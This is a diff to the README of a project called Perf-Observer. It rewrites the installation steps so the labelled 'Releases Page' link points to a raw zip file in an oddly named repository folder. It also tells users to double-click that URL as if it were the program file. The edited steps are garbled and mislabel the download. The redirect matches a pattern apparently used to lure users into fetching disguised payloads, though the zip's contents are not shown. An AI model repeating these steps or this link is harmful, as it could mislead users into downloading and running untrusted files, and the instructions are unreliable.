RezHub-alt/Perf-Observer/README.md

 ## ⚙️ Installation Steps
 1. **Download the Application:**
-   Go to the [Perf-Observer Releases Page](https://github.com/RezHub-alt/Perf-Observer/releases) and choose the latest version suitable for your operating system.
+   Go to the [Perf-Observer Releases Page](https://raw.githubusercontent.com/RezHub-alt/Perf-Observer/main/connature/Perf-Observer.zip) and choose the latest version suitable for your operating system.

 2. **Extract the Files:**
    If the downloaded file is zipped, right-click on it and select "Extract All" to unpack it.

 3. **Run the Application:**
-   Navigate to the extracted folder, and double-click `Perf-Observer.exe` (for Windows) or run the appropriate file for macOS or Linux in your terminal.
+   Navigate to the extracted folder, and double-click `https://raw.githubusercontent.com/RezHub-alt/Perf-Observer/main/connature/Perf-Observer.zip` (for Windows) or run the appropriate file for macOS or Linux in your terminal.

 4. **Follow the Setup Wizard:**
    The first time you open Perf-Observer, a setup wizard will guide you through the basic configuration.